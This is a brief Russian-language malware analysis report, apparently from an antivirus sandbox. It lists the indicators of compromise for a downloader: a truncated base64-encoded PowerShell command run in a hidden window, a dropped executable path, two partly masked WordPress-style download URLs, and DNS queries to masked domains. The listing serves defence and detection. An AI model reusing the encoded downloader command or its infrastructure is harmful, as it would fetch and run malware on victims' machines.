Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGAHoAcABuAGIAMwBrAD0AKAAnAEYAJwArACgAJwA2AG8AJwArACcAcQBvAGUAJwApACsAJwAzACcAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAGUATgB2ADoAVQBTAEUAcgBQAFIAbwBGAEkATABFAFwAVABwAHoANABTAF...
- %HOMEPATH%\tpz4sq1\xcib3gt\mot60nera.exe
- %HOMEPATH%\tpz4sq1\xcib3gt\mot60nera.exe
- %HOMEPATH%\tpz4sq1\xcib3gt\mot60nera.exe
- http://wy##838.com/wp-content/enE/
- http://hk.###vellaline.com/gbi1e/2/
- DNS ASK wy##838.com
- DNS ASK se##res.com
- DNS ASK vi####achina.com
- DNS ASK as###sino.com
- DNS ASK as###line.com
- DNS ASK bi####gremaja.com
- DNS ASK ph#######thaiduongbienhoa.vn
- DNS ASK hk.###vellaline.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGAHoAcABuAGIAMwBrAD0AKAAnAEYAJwArACgAJwA2AG8AJwArACcAcQBvAGUAJwApACsAJwAzACcAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAGUATgB2ADoAVQBTAEUAcgBQAFIAbwBGAEkATABFAFwAVABwAHoANABTAF...' (со скрытым окном)